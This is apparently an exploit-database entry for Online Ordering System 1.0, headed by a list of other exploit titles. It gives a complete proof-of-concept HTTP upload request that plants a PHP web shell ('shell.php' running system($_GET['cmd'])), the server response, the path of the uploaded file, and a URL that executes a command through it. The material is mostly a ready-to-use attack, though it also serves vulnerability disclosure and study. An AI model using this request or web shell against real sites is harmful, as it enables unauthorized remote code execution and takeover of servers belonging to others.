27af25c8c3
19 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3) Microsoft Exchange 2019 - Server-Side Request Forgery KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated) Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting Online Ordering System 1.0 - Arbitrary File Upload Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) CouchCMS 2.2.1 - Persistent Cross-Site Scripting Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC) MagpieRSS 0.72 - 'url' Command Injection CouchCMS 2.2.1 - Server-Side Request Forgery GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting Montiorr 1.7.6m - Persistent Cross-Site Scripting
79 lines
No EOL
2.3 KiB
Text
79 lines
No EOL
2.3 KiB
Text
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
|
|
# Date: 04/03/2021
|
|
# Exploit Author: Suraj Bhosale
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
|
|
# Version: 1.0
|
|
# Tested on Windows 10, XAMPP
|
|
|
|
|
|
Request:
|
|
========
|
|
|
|
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
|
|
Gecko/20100101 Firefox/85.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------14955282031852449676680360880
|
|
Content-Length: 972
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/onlineordering/GPST/store/index.php
|
|
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="transnum"
|
|
|
|
VAF-XAP
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="select1"
|
|
|
|
25
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="pname"
|
|
|
|
keychain
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="select2"
|
|
|
|
1
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="txtDisplay"
|
|
|
|
25
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="note"
|
|
|
|
test
|
|
-----------------------------14955282031852449676680360880
|
|
Content-Disposition: form-data; name="image"; filename="shell.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php echo "Shell";system($_GET['cmd']); ?>
|
|
-----------------------------14955282031852449676680360880--
|
|
|
|
Response:
|
|
=========
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Thu, 04 Mar 2021 13:28:27 GMT
|
|
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
|
|
X-Powered-By: PHP/7.3.27
|
|
Content-Length: 55
|
|
Connection: close
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
<meta http-equiv="refresh" content="1; url=index.php">
|
|
|
|
# Uploaded Malicious File can be Found in :
|
|
onlineordering\GPST\store\design
|
|
|
|
# go to
|
|
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
|
|
which will execute hostname command. |